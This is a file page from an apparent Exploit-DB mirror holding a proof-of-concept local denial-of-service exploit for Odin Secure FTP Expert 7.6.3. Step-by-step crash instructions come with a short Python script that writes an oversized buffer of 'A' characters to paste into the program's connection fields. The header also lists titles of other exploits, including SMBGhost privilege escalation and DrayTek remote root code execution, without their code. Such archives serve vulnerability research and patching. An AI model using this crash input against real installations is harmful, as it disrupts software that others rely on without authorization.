exploit-db-mirror/exploits/windows/dos/48262.py
Offensive Security 169b528eaa DB: 2020-03-31
6 changes to exploits/shellcodes

Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)
10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation

Multiple DrayTek Products - Pre-authentication Remote Root Code Execution

ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)
Joomla! com_fabrik 3.9.11 - Directory Traversal
Zen Load Balancer 3.10.1 - Remote Code Execution
2020-03-31 05:01:48 +00:00

25 lines
No EOL
855 B
Python
Executable file

# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2020-03-27
# Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/
# Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
# Version : Odin Secure FTP Expert 7.6.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Home Single Lenguage (ESP)
Steps to Produce the Crash:
1.- Run python code: OdinSecureFTP.py
2.- Copy content to clipboard
3.- Open "OdinSecureFTPExpert.exe"
4.- Go to "Trial" > Connect > Quickconnect site
5.- Paste ClipBoard into the all fields
6.- Go to Connect
7.- Crashed
Python "OdinSecureFTP" Code:
buffer = "\x41" * 108
f = open ("OdinSecureFTP.txt", "w")
f.write(buffer)
f.close()